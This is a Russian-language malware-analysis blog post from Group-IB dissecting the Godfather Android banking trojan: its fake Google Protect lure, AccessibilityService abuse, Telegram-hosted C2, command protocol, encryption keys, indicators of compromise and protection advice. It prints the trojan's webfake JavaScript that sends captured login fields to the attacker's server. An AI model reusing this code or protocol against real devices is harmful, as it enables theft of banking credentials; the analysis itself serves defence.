РУССКИЙ

ENGLISH

21.12.2022

Godfather

Приложение, от которого невозможно отказаться

Артем Грищенко
Младший специалист по анализу вредоносного кода, Group-IB

Банковский Android-троян Godfather активно атакует пользователей популярных финансовых сервисов по всему миру. В списке его жертв более 400 международных целей: банки, криптовалютные биржи и электронные кошельки. При этом мало кто догадывается, что “под капотом” у Godfather прячется старичок — некогда известный банкер Anubis, чей функционал безнадежно устарел из-за выхода обновлений для Android. В этом блоге специалист Group-IB Threat Intelligence подробно рассказывает о том, как и кого атакует Godfather и какое наследство ему досталось от его предшественника.

Впервые активность Godfather — мобильного банковского трояна, похищающего учетные данные клиентов банков и криптобирж, команда Group-IB Threat Intelligence заметила в июне 2021 года. Год спустя, в марте 2022-го, исследователи из Threat Fabric первыми упомянули этот банкер публично и уже через пару месяцев, в июне, активность трояна прекратилась. Godfather залег на дно. Однако в сентябре 2022 года он вернулся, правда уже с немного измененным функционалом.

В списке жертв Godfather пользователи 215 международных банков, 94 криптокошельков и 110 криптопроектов (данные приведены на момент исследования - октябрь 2022 года, — прим ред). Больше всего целей у трояна в США, Турции, Испании, Канаде, Франции и Великобритании. При этом Godfather обходит стороной пользователей из России и СНГ: если настройки системы содержат один из языков этого региона, троян завершит свою работу. Вероятно, это одно из указаний на то, что разработчиками Godfather являются, предположительно, русскоязычные злоумышленники.

Визитной карточкой любого Android-банкера являются webfake’и (отображаемые поверх легитимных приложений html-страницы), и у Godfather’а мы обнаружили их в избытке. Godfather может отобразить webfake в случае, когда пользователь кликнет на уведомление обманку или запустит легитимное приложение, которое содержится в целях трояна. Все введенные в эти страницы данные (такие как имя пользователя и пароль) будут отправлены на сервер, контролируемый злоумышленниками.

Примеры webfake-страниц мобильных приложений турецких банков и электронных кошельков.

Что еще умеет Godfather?

Ведет запись экрана зараженного устройства;
Активирует VNC-подключение;
Запускает keylogger;
Эксфильтрация Push уведомлений (используется для обхода 2-FA). В первых версиях выполнялась также эксфильтрация SMS;
Переадресует вызовы (также используется для обхода 2-FA);
Выполняет USSD-запросы;
Рассылает SMS-сообщения с зараженного устройства;
Запускает Proxy-сервера;
Выполняет Websocket-подключения (добавлено в новой версии Godfather от сентября 2022 года).

Незабытое старое: Anubis, мы тебя узнали

В основе Godfather лежит одна из версий банковского трояна Anubis, чей исходный код был слит еще в 2019 году. С выходом новых версий Android многие из возможностей трояна Anubis перестали функционировать и он мог бы отправиться на свалку истории. Но зачем создавать новый троян, если есть уже готовый старый?

Дело в том, что Android - излюбленная ОС для банкерописателей, и разработчики из Google прилагают все усилия чтобы защитить своих пользователей. Поэтому с момента "слива" исходников классического Anubis'а некоторые функциональные возможности перестали работать (на момент создания банкера некоторые современные защитные механизмы Android просто-напросто отсутсвовали). При этом код проекта настолько хорош, что стал бестселлером у разработчиков ВПО - достаточно взять код проекта, переписать "мертвую" часть и добавить свои фичи. Именно по этому пути и пошли разработчики Godfather.

Исходный код Anubis трояна был взят за основу разработчиками Godfather и модернизирован под более новые версии Android с добавлением актуальных на данный момент возможностей, а некоторый функционал такой как шифрование файлов был попросту удален.

Мы установили, что два этих трояна Anubis и Godfather имеют одну кодовую базу, однако протокол взаимодействия с сервером, список функциональных возможностей и их реализация у Godfather были модифицированы, так что Godfather является скорее “форком” трояна Anubis.

Сравнение троянов Godfather и Anubis

Учитывая то, что исходный код Anubis находится в публичном доступе, нельзя сказать о том, что данные трояны написаны одним и тем же разработчиком или их операторами является одна и та же группа.

Одна из особенностей Godfather в том, что его командный сервер содержится в описании Telegram-канала (техника получения С2 адреса из Telegram-канала ранее использовалась в некоторых версиях Anubis). Один из Telegram-каналов содержал сообщения, которые указывают на то, что данный вредонос распространяется по принципу MaaS (Malware-as-a-Service). Вероятно, данные сообщения адресованы операторам данного трояна.

На момент подготовки этого блога метод распространения Godfather так и не был установлен. Однако, исходя из имеющихся данных, мы полагаем, что Godfather распространяется тем же способом, что и банкер Anubis. Операторы Anubis часто использовали метод распространения полезной нагрузки через приложение загрузчик на Google Play. Также как и в некоторых случаях с Anubis загружаемая нагрузка мимикрирует под приложение Google Protect. Пример цепочки заражения банкером Anubis вы можете увидеть в статье доступной по ссылке.

В ходе исследования сетевой инфраструктуры трояна, был обнаружен домен, который является C&C адресом Android Downloader. Нам не удалось получить нагрузку. Однако, мы полагаем, что данный загрузчик устанавливал на устройство троян Godfather. Ниже представлен скриншот из графа сетевой инфраструктуры Group-IB Threat Intelligence, на котором представлены связи между C&C адресами Godfather и Downloader.

C&C адреса трояна Godfather:

henkormerise[.]com
banerrokutepera[.]com
heikenmorgan[.]com

Домен pluscurrencyconverter[.]com - С&C адрес Downloader. Также ниже представлена схема DNS replications С&C адресов Godfather.

Ниже представлен скриншот страницы данного загрузчика на Google Play.

Скриншот вредоносного приложения, связанного с дистрибутивом Godfather в Google Play Store (источник: @0xabc0 )

В этом блоге мы сфокусировались на подробном изучении двух версий трояна Godfather:

MD5: d7118d3d6bf476d046305be1e1f9b388
SHA1: 2b3b78d3a62952dd88fc4da4688928ec6013af71
SHA256: c79857015dbf220111e7c5f47cf20a656741a9380cc0faecd486b517648eb199
VT Submission: 2022-03-22

MD5: 7e061e87f9a4c27bfb69980980270720
SHA1: 34d37927b35f422e7c28055ea989ef6524a668ef
SHA256: b6249fa996cb4046bdab37bab5e3b4d43c79ea537f119040c3b3e138149897fd
VT Submission: 2022-09-11

Должностные обязанности Дона

Изученные образцы Godfather мимикрируют под приложение Google Protect. После запуска вредоносного приложения пользователем выполняется эмуляция работы легитимного приложения. Несмотря на то, что анимация демонстрирует “активность” Google Protect, каких-либо активных действий “сканер” не проводит — вместо этого Godfather демонстрирует свой “криминальный нрав”. После запуска он установит себя в автозапуск, создаст закрепленное уведомление и скроет свою иконку из списка установленных приложений.

Анимация "активности" Google Protect

В ходе инициализации также будет запущен сервис для запроса прав к AccessibilityService (AccessibilityService — это одна из функций Android, которая используется разработчиками для адаптации своих приложений к пользователям, имеющих ограниченные возможности, в последнее время разработчиками Android-банкеров активно используется для реализации ATS-функций). Также запрос прав AccessibilityService выполняется при нажатии на кнопку “Scan”. Важно отметить, что пользователь не сможет запустить “сканирование” системы без выданных трояну прав AccessibilityService.

Неудивительным будет факт того, что сканирование устройства не выполняется. Анимация процесса сканирования отображается на протяжении 30-и секунд, после чего отобразится сообщение о том, что никаких вредоносных приложений найдено не было.
Получив доступ к Accessibility, Godfather выдаст себе все необходимые права. А также, начнет взаимодействие с командным сервером.

Будучи уверенным, что никаких троянов на устройстве не обнаружено, пользователь запустит банковское приложение и введет свои учетные данные, не осознавая того, что эти данные только что попали в руки злоумышленников.

Однако после того как пользователь обнаружит, что вместо денег на его банковском счете всего лишь ноль, обернутый в рубашку украденной валюты, он поймет намек Дона, и попытается отозвать права или удалить установленное приложение, но настройки будут постоянно закрываться и устройство будет возвращаться на главный экран.
Как же глава итальянской мафии провернул такую кражу? Давайте разбираться подробнее.

Технические детали

При первом запуске Godfather выполняет следующие действия:

Проверка локали и контекста системы
Инициализация параметров SharedPreferences
Запуск сервиса для запроса прав к AccessibilityService
Запуск сервиса для взаимодействия с командным сервером
Скрытие иконки приложения из меню

Разберем более детально некоторые из пунктов выше:

Проверка локали и контекста системы

Выполняется проверка локали системы, в случае если локаль имеет одно из значений:

RU (Россия)
AZ (Азейбарджан)
AM (Армения)
BY (Беларусь)
KZ (Казахстан)
KG (Киргизстан)
MD (Молдова)
UZ (Узбекистан)
TJ (Таджикистан)

вредонос завершит свою работу. Также выполняется проверка контекста устройства в целях определения, запущен ли троян в контексте эмулятора и если это так — Godfather завершит свою работу.

Инициализация параметров SharedPreferences

Godfather использует SharedPreferences для хранения необходимых ему настроек, таких как С2 сервер, статус получения необходимых прав, список целей, лог данные и так далее. Файл конфигурации имеет название config.xml. Однако параметры для хранения настроек VNC (settings_port, settings_password), сохраняются в файл настроек по умолчанию. Также на данном этапе генерируется уникальный идентификатор (в трафике поле имеет название “key”), который используется для идентификации зараженного устройства (фактически, это id бота). Алгоритм генерации: 15 символов выбираются случайным образом из алфавита "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890".

Cервис для запроса прав к AccessibilityService

Сервис выполняет проверку, выдан ли соответствующий доступ приложению, в случае если права выданы не были, выполняет запрос данных прав, а также создает всплывающее уведомление с текстом “Enable accessibility for protection to take effect ‘Google Protect’”. Данная процедура будет выполняться каждые 8 секунд, до момента, пока пользователь не предоставит приложению доступ к AccessibilityService.
Помимо запуска при инициализации, сервис будет запущен при перезагрузке, включении и разблокировки устройства. Подробная информация о том, для чего используется доступ к AccessibilityService, описан в разделе “AccessibilityService”.

Cервис для взаимодействия с командным сервером

Сервис создает задачу, выполняемую каждые 70 секунд. Данный сервис будет запускаться при включении, перезагрузке и разблокировки устройства. Перед получением С2-сервера и взаимодействия с ним, выполняется проверка наличия необходимых прав (запись во внешнее хранилище, чтение списка контактов, чтение состояния устройства и выполнение вызовов). В случае если приложение не имеет данных прав выполняются следующие действия:

запрос на получение необходимых прав;
эксфильтрация телефонной книги;
эксфильтрация списка установленных приложений.

Также выполняется проверка наличия прав администратора, в случае, если эти права отсутствуют, выполнится запрос на получение данных прав.
Далее начинается взаимодействие с командным сервером для получения команд и включения модулей трояна. Подробнее сетевые запросы, а также команды, которые могут быть выполнены в результате данных запросов, описаны в разделе “Сетевое взаимодействие”.

Сетевое взаимодействие

Выше представлена общая схема взаимодействия Godfather c C2-адресом. Логически общение с сервером может быть разделено на три части:

Получение актуального адреса C2
Получение общих команд (RatCommandRequest)
Получение команд на запуск отдельных модулей ВПО (InjectCommandRequest)

Примечательно, что запрос команд типа RatCommandRequest и InjectCommandRequest происходит параллельно.
Троян не содержит в себе актуальный список C2 адресов. Вместо этого он получает их из описания Telegram-канала, производя HTTP-запрос (на схеме GetC2Request). Пример Telegram-канала с зашифрованным C2-адресом представлен ниже. Актуальный C2-адрес зашифрован Blowfish (Mode ECB), где ключом является строка "ABC". Этот же алгоритм используется для расшифрования полученных от сервера команд, которые приложение сразу же запрашивает после получения адреса С2. Как мы уже описали выше, есть два модуля получения команд — обычные команды и команды на включение или отключение модулей трояна (на схеме RatCommandRequest, InjectCommandRequest).

RatCommandRequest

Запрос используется для получения команд и списка приложений-жертв. Параметры запроса содержат следующую информацию об устройстве:

Название оператора сети
Состояние телефона (заблокировано или разблокировано)
Были ли получены права AccessibilityService
Установлен ли сервис трояна для обработки SMS
Получены ли необходимые права (запись во внешнее хранилище, чтение списка контактов, чтение состояния устройства и выполнение вызовов)
User-Agent устройства по умолчанию
Подключено ли зарядное устройство (в новой версии отсутствует)
Код страны текущего оператора
Bot ID (параметр “key”)
Выполняется ли в текущий момент запись экрана
Список установленных приложений
Версия Android
Модель устройства

Пример тела запроса:

{country=us, new=true, ver=8.1.0, accessibility=true, ag=Mozilla/5.0 (Linux; Android 8.1.0; Google Pixel 2 Build/OPM6.171019.030.E1; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.186 Mobile Safari/537.36, applist=com.rigbak.adnam2|||, startnow=0, replay=true, eyes=1, logd=new, sim=(Android, app_perm_check=false, batterycharging=xx, sms_value=0, model=Google Pixel 2 (vbox86p)(i686), tag=PTS, perm_all=0, key=XQFGCGFTWXMH6PC}

Ответ от сервера имеет следующий формат:

%СOMMAND%|%PARAM1%|%PARAM2%|%PARAM3%|%PARAM4%

Ниже представлена таблица команд, могут быть отправлены боту от C2:

startUSSD; Выполнение USSD запроса (запрос приходит от сервера как параметр) sentSMS; В новых версиях данная команда не обрабатывается, однако в старых версиях, распространяемых с июня 2021 года, данная команда обрабатывалась и выполняла отправку SMS сообщения с зараженного устройства (номер телефона и текст сообщения будут получены от сервера как параметры) startApp; Запуск приложения (название пакета приложения приходит как параметр от сервера) cachecleaner; Очистка кэш-данных приложения (имя пакета приходит как параметр от сервера) BookSMS; На текущий момент команда не реализована, однако в версиях, распространяемых с сентября 2021 года, выполняла рассылку SMS сообщений всей книге контактов (текст сообщения будет получен от сервера как параметр) startforward/stopforward; Включение и отключение переадресации вызовов (номер телефона приходит от сервера как параметр) openbrowser; Открытие произвольной web страницы (URL приходит как параметр от сервера) startsocks5/stopsocks5; Включение и отключение proxy SOCKS5 (host, user, pass и port будут получены от сервера как параметры) killbot; Самоудаление startPush; Отображение push уведомления, после перехода на которое будет открыта веб страница (webfake). Параметры appname, title, text приходят от сервера как параметры

InjectCommandRequest

Как уже говорилось выше, запрос используется для включения/отключения различных модулей трояна. Ниже перечислены события, которые могут быть выполнены в результате данного запроса:

Включение Keylogger-а
Запуск VNC-сервера
Запуск записи экрана
Выполнение блокировки экрана
Запуск эксфильтрации и блокировки уведомлений
Включение беззвучного режима
Выполнение WebSocket подключения
Затемнение экрана

Данный запрос не отправляет на сервер какую-либо информацию о зараженном устройстве. Пример параметров запроса представлен ниже.

{inject_check=true, key=XQFGCGFTWXMH6PC}

Ответ от сервера имеет следующий формат: {0}:{1}:{2}:{3}:{4}:{5}:{6}:{7}:{8}:{9}:{10}:{11}:{12}:{13}:{14}:{15}:{16}

(Пример:"Injection::false::close:close:open:close:close:close:close:close:close:none::close:close").

Значения {*} - являются обрабатываемыми параметрами. В таблице ниже представлено описание каждого из параметров:

{0}; Содержит строку "Injection" — она необходима для запуска процесса обработки остальных параметров {1}; Данный параметр используется для доставки списка пакетов, для которых, в случае их запуска, будет загружен webfake {2}; В случае если содержит значение “true” — будет включена опция эксфильтрации и удаления получаемых SMS с устройства. Иначе опция будет отключена {3}; Содержит сервер для выполнения обратного VNC соединения (VNC соединение выполняется на порт 5500) {4}; Параметр должен содержать значение "open" для обратного VNC соединения к указанному в параметре {3} серверу {5}; Если содержит "open" выполняется включение беззвучного режима, а также запускается задача, которая будет выполнять разблокировку устройства каждые 30 секунд. Данная опция позволяет получать и выполнять команды от сервера, когда устройство находится в заблокированном режиме. {6}; Если содержит "open" выполняется запуск Keylogger-а, иначе выполняется его отключение (в ходе исследования это единственный параметр который был включен) {7}; Если содержит "open" выполняется запуск VNC сервера {8}; Если содержит "open" выполняется остановка VNC сервера {9}; Если содержит "open" выполняется сброс настроек записи экрана {10}; Если содержит "open" выполняется запуск записи экрана {11}; Если содержит "open" выполняется блокировка экрана {12}; Если содержит "open" выполняется включение эксфильтрации уведомлений, иначе выполняется остановка эксфильтрации уведомлений {13}; Имя пакета приложения, которое будет выключено в случае его запуска на устройстве {14}; Адрес сервера, c которым будет выполнено WebSocket соединение с целью удаленного контроля зараженным устройством {15}; Если содержит "open" выполняется WebSocket соединение (Адрес содержится в опции выше) {16}; Если содержит "open" выполняется затемнение экрана

URI для запросов содержится внутри файла. Ниже представлены примеры, которые были найдены в ходе исследования файлов:

/aks.php
/ads.php
/forwadingx.php

Эксфильтрация данных

В ходе работы трояна на С2-сервер будет выполняться эксфильтрация необходимых злоумышленнику данных. Данная выгрузка осуществляется с помощью запросов, которые имеют следующие параметры:

key — Bot ID
message — собранные данные в зашифрованном виде
number — "true"
page — тип выгружаемых данных

Пример запроса:

{number=true, page=1, message
=f8d2382f72890b1975e1f149d07fdd3c36fff1d523e4ea83b2b1f593f956e7a0, key=D5GL78W1ESCYN7P}

Поле “message” содержит информацию в зашифрованном виде. Алгоритм шифрования AES (Mode CBC), где ключ "0123456789abcdef", а вектор инициализации "fedcba9876543210". Поле “page” характеризует тип выгружаемых данных и имеет одно из следующих значений 1, 2, 4, 5. Ниже представлена таблица с описанием выгружаемой информации по типу “page”.

AccessibilityService

Одна из важных деталей Godfather в том, что вредоносная активность не будет выполняться без выданного доступа к AccessibilityService. Обработчик событий трояна Godfather содержит следующий функционал:

Ограничение пользователя от возможности удалить троян из системы (в случае запуска настроек приложений или редактировании списка приложений имеющих права администратора, данные окна будут закрыты)
Выдача необходимых прав, таких как обработка SMS, обработка уведомлений, права для записи экрана, права администратора
Эксфильтрации OTP-паролей из приложения Google Authenticator (com.google.android.apps.authenticator2) аналогично Cerberus
Эксфильтрация содержимого полей использующихся для ввода PIN-кода или пароля
В случае запуска приложения из списка целевых приложений, будет запущена запись экрана этого приложения (в случае если была получена опция для включения модуля записи экрана) или отображении webfake-а (в случае если приложение содержится в списке приложений полученных от сервера для возможности загрузки webfake-а)
Обработка команд: cachecleaner, killbot
Выполнение эксфильтрации результата USSD запроса, в случае если была получена команда startUSSD

Также AccessibilityService включает в себя обработку keylogger функционала. Ниже представлен шаблон записи, соответствующий типу события:

При срабатывании события TYPE_NOTIFICATION_STATE_CHANGED и при условии, что включена опция эксфильтрации уведомлений, содержимое полученного уведомления будет выгружено на С2-сервер.

Proxy-модуль

Godfather имеет возможность запуска на зараженном устройстве backconnect proxy сервер, для работы которого используется порт 34500 (расположен в теле трояна). Троян открывает и настраивает данный порт для обработки протокола SOCKS5. Параметры (host, user, pass, port), которые необходимы для реализации proxy, будут получены вместе с командой для запуска proxy (startsocks5).

VNC-модуль

Godfather осуществляет работу VNC с помощью двух нативных библиотек, которые хранятся в ресурсах трояна в зашифрованном виде. Алгоритм шифрования AES (Mode ECB), где ключом является строка "GWy8tfjp4mXpu58fCRpWCLxqHV8YmeHR". Библиотеки хранятся в ресурсах трояна со следующим шаблоном названий: lib.%ARCHITECTURE%.godfat.so, lib.%ARCHITECTURE%.vncserver.so. Стоит отметить, что в новой версии трояна данные библиотеки хранятся в незашифрованном виде и имеют следующие названия: libspotify.so, libjson.so.

lib.%ARCHITECTURE%.vncserver.so — open source библиотека, используемая для реализации VNC-соединения. Код данной библиотеки доступен на github: https://github.com/LibVNC/libvncserver

Библиотека lib.%ARCHITECTURE%.godfat.so — JNI (Java Native Interface) обертка, необходимая для корректной работы вышеуказанной Unix-библиотеки.
Фактически передача управления по VNC происходит в два этапа:

Управляющий сервер высылает команду на запуск VNC-модуля
Управляющий сервер высылает адрес, с которым свяжется зараженное устройство и передаст VNC-управление (установит backconnect VNC-соединение)

При получении команды на запуск VNC сервера, никаких параметров от сервера не обрабатывается. Ниже представлены статические параметры, которые используются при запуске сервера:

port — значение параметра SharedPreferences "settings_port" (значение по умолчанию 5900)
user — значение параметра из настроек системы "bluetooth_name"
pass — значение параметра SharedPreferences "settings_password" (значение по умолчанию "123")

При обработке команды на выполнение обратного VNC-соединения передается "host", к которому будет выполнено обратное соединение. Порт для подключения содержится внутри файла и имеет значение 5500 (порт для обратного VNC подключения “по умолчанию”).

Ниже представлена схема процесса подключения к удаленному VNC-клиенту:

ScreenCapture модуль

Модуль используется для записи экрана зараженного устройства и последующей её эксфильтрации на С2 сервер. Данный модуль позволяет украсть данные, вводимые пользователем в легитимные приложения, а также любые данные содержащиеся в том или ином приложении, на который нацелен Godfather. Данный модуль будет запущен в одном из двух случаев:

От сервера поступила соответствующая команда
Запущено приложение из списка целей (список должен быть получен трояном ранее)

Стоит отметить, что некоторые имена пакетов из списка были намеренно изменены (к имени пакета добавлен символ “1”), для того чтобы избежать запуск модуля. Возможно, злоумышленники все еще не придумали, что им делать с полученными данными, либо просто потеряли интерес к данным приложениям на этапе тестирования. Запись экрана осуществляется с использованием стандартных Android классов:

android.media.projection.MediaProjectionManager
android.media.projection.MediaProjection

Запись осуществляется в файл, путь к которому формируется по следующему шаблону:

%DEFAULT_DIRECTORY_MOVIES%/%KEY%_%CURRENT_TIME_MS%.mp4

Запись будет остановлена спустя две минуты после ее начала. Далее выполняется выгрузка записанного файла на С2 сервер. URL который используется при выгрузке файла, формируется по шаблону:

%DECRYPTED_C2%/mp4_recorder.php

Формат тела запроса представлен ниже:

--*****\r\nContent-Disposition: form-data; name=\"myfile\";filename=\"%FILENAME%\"\r\n\r\n%FILE_CONTENT%\r\n--*****--\r\n

Для инициализации записи экрана должны быть включены соответствующие опции получаемые от С2 сервера, а также получены соответствующие права.

WebSocket модуль

Данный модуль был добавлен в обновленную версию банковского трояна от сентября 2022 года. Он позволяет использовать постоянное соединение WebSocket для контроля зараженного устройства. На данный момент Godfather обрабатывает 3 варианта сообщений от сервера:

Выполнение действия “Back”
Выполнение кликов
Запись текста

Сервер, к которому будет выполнено соединение, должен быть получен от С2 сервера, как одна из опций в запросе InjectCommandRequest.

Модуль отображения Webfake-ов

Godfather полностью реализует модуль загрузки и отображения webfake-ов банковского трояна Anubis. Полученные webfake-и также имеют идентичный способ эксфильтрации введенных пользователем данных в webfake.

Загрузка webfake-ов может быть выполнена в двух случаях: в случае, если пользователь перешел по push-уведомлению обманке, а также в случае, если было открыто приложение из списка целей.

В случае с уведомлением-обманкой, помимо webfake-a, также будет загружена иконка для уведомления. Иконка располагается на URL, который имеет следующий шаблон:

%DECRYPTED_C2%/icon/%PACKAGE_NAME%.png

%PACKAGE_NAME% — имя пакета приложения, под которое мимикрирует уведомление-обманка. URL для загрузки webfake-ов имеет шаблон:

%DECRYPTED_C2%/itor/fafa.php?f=%PACKAGE_NAME%&p=%KEY%|%LOCALE%

Где %KEY% — ключ, который отправляется как параметр в запросах выше, а %LOCALE% — язык системы. User-Agent использующийся при выполнении запроса:

Mozilla/5.0 (Linux; Android 9; SM-J730F Build/PPR12.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36


function submit_data(form) {
           var json = {};
           for( var i = 0 ; i < form.length ; i++ )
           {
               var input = form[i];
               if ( input.type == "submit" )
                   continue;
               json[ form[i].name ] = form[i].value;
           }
   logs = ""
   $.each(json, function(i, v) {
       logs = logs + "" + i + ":" + v + "//br//";
   });
   top['closeDlg'] = true;
   var url = '%C2%';
   var imei_c = '%KEY%|%LOCALE%';
 
   location.replace(url + '/sender_new.php?p=' + imei_c + "|Injection_10|%PACKAGE_NAME%|" + logs+'|918')
}

Полученные HTML страницы содержат JS-скрипт (пример представлен выше), который используется для обработки формы авторизации. При попытке авторизации будет выполнен запрос на С2-сервер. URL запроса формируется по шаблону:

%DECRYPTED_C2%/sender_new.php?p=%KEY%|%LOCALE%|Injection_10|%PACKAGE_NAME%|%FORMATTED_DATA%

Где %FORMATTED_DATA% - строка сформированная по шаблону

%FIELD_NAME%:%FIELD_VALUE%//br//%FIELD_NAME%:%FIELD_VALUE%//br//

Заключение: рекомендации по защите

Безопасность мобильных приложений и самих операционных систем стремительно развивается. Однако, банковские Android-трояны рано списывать со счетов. Мы по-прежнему видим их высокую активность и широкое распространение модификаций троянов, исходный код которых был опубликован в публичном доступе. Самый яркий пример — проанализированный в этом блоге Godfather. Этот троян наносит ущерб не только пользователям банковского приложения, но и всему банковскому сектору.

Для пользователей криптокошельков и банковских приложений, эксперты Group-IB рекомендует:

всегда проверять наличие обновлений на мобильном устройстве: более новые версии Android менее уязвимы к подобным атакам;
не загружать приложения со сторонних источников, кроме Google Play (однако, даже Google Play не является гарантией безопасности), а также проверять запрашиваемые приложением права до его установки;
не давать лишних прав приложению и всегда проверять, какие права оно требует для своей работы (в случае с трояном Godfather, все его коммуникации с сервером выполняются только после выдачи доступа к AccessibilityService);
не посещать посторонние и подозрительные ресурсы;
не переходить по ссылкам из SMS-сообщений.

В случае если ваше устройство подверглось заражению, вам необходимо выполнить следующие действия:

Отключить доступ к сети.
Заморозить ваши счета к которым мог быть получен доступ с устройства.
Обратиться к специалистам для получения более подробной информации о рисках, которые могло повлечь вредоносное ПО оказавшееся на устройстве.

Учитывая, что разработчики трояна позаботились о том, чтобы затруднить его обнаружение, финансовым организациям, чьи клиенты пользуются мобильными приложениями, необходимо менять подход к их защите. В отличие от классического антифрода, решения класса Group-IB Fraud Protection «умеют» находить и останавливать вредоносную активность задолго до осуществления атаки, при попытке воспроизвести действия легитимного пользователя.